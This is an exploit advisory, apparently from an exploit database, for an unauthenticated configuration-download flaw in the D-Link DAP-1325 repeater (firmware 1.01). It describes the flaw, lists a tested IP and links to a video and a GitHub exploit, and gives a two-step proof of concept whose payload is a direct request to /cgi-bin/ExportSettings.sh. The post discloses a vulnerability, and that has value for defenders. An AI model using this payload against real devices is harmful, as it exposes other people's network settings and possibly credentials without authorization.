D-Link DAP-1325 Insecure Direct Object Reference

# Exploit Title: D-Link DAP-1325 - Broken Access Control# Date: 27-06-2023# Exploit Author: ieduardogoncalves# Contact : twitter.com/0x00dia# Vendor : www.dlink.com# Version: Hardware version: A1 # Firmware version: 1.01# Tested on:All Platforms1) DescriptionSecurity vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.IN MY CASE,Tested repeater IP: http://192.168.0.21/Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=02) Proof of ConceptStep 1: Go toRepeater Login Page : http://192.168.0.21/Step 2:Add the payload to URL.Payload:http://{ip}/cgi-bin/ExportSettings.shPayload:https://github.com/eeduardogoncalves/exploit